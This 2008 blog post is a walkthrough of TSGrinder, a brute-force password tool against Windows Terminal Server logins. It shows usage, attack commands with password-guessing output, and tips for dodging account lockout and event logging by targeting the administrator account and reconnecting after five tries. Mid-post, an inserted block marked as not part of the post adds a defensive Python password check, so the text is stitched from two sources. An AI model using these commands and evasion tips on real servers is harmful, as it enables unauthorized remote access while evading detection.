Tuesday, July 22, 2008

tsgrinder

TSGrinder is a terminal server brute-force tool. It uses dictionary attacks and has a very useful leet function. Granted, the leet file and dict file it ships with are weak to start with, but that is easily remedied. If you run the command with no arguments you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The built-in example demonstrates very well how to use this program. For this walkthrough I will be attacking my own server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it outputs success and logs off of mstsc. Since the default dict file is weak, I recommend googling for a word list file; this will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to edit this by adding some more, such as:
a @
o 0
etc. I also recommend using the administrator account for these attacks, since by default it won't get locked out after so many password attempts. Also, if you noticed, tsgrinder tries 5 passwords, disconnects, reconnects, and then tries 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts. This app won't generate a Windows event log entry either. Now for the 1337: you just add the "-l" switch to the command.
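A defensive use of the same leet rules, as an added example (not part of this post or of TSGrinder): a password-policy check in Python that parses a leet file in the "<letter> <substitute>" format shown above, undoes the substitutions, and rejects any password that is a plain or leet-spelled dictionary word. The leet rules and the six-word dictionary are constructed here, and the function names are my own.

```python
import itertools

# Constructed leet file in TSGrinder's "<letter> <substitute>" format, with
# the two extra rules suggested above (assumption: one rule per line).
LEET_FILE = """l 1
e 3
t 7
s 5
a @
o 0
"""

# Constructed mini word list; a real check would load a full dictionary file.
DICTIONARY = {"password", "access", "academia", "academic", "admin", "airplane"}


def parse_leet(text):
    """Parse leet rules into a substitute -> [letters] map (reverse direction)."""
    reverse = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip blank or malformed lines
        letter, sub = parts
        reverse.setdefault(sub, []).append(letter)
    return reverse


def candidates(password, reverse, max_positions=12):
    """Yield every spelling obtained by undoing leet substitutions.

    Each substitutable character may be kept or reverted, so k such
    characters give up to 2**k candidates; past max_positions only the
    fully reverted form (last letter per substitute) is tried.
    """
    options = [[ch] + reverse.get(ch, []) for ch in password.lower()]
    if sum(len(o) > 1 for o in options) > max_positions:
        yield "".join(o[-1] for o in options)
        return
    for combo in itertools.product(*options):
        yield "".join(combo)


def is_leet_dictionary_word(password, reverse, dictionary):
    """True if the password is a dictionary word or a leet spelling of one."""
    return any(c in dictionary for c in candidates(password, reverse))


if __name__ == "__main__":
    rules = parse_leet(LEET_FILE)
    for pw in ("acc355", "P@ssw0rd", "Tr0ub4dor&3"):
        print(pw, "weak" if is_leet_dictionary_word(pw, rules, DICTIONARY) else "ok")
```

Run against a real word list, the check flags exactly the variants the -l switch would have tried, so such passwords are rejected before a brute-force tool ever sees them.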

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you roughly how it works. There is also the "-n" switch, which allows more than 1 session. With one session you are able to try 5 passwords in 10 seconds, but with "-n 2" you can try 10 passwords in 11 seconds. I haven't tried more than 2 simultaneous connections since it does slow your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3

2 comments:

nate808 said...

I get an error using WinXP Home SP3. It says:

timed_Event_send_recv: Wait failed: TIMEOUT
Couldn't get handle to client window

I found the roboclient but am not sure what this means... any ideas?

cheers
nate

Thedemon007 said...

Check this: http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,3326.msg21410/topicseen,1/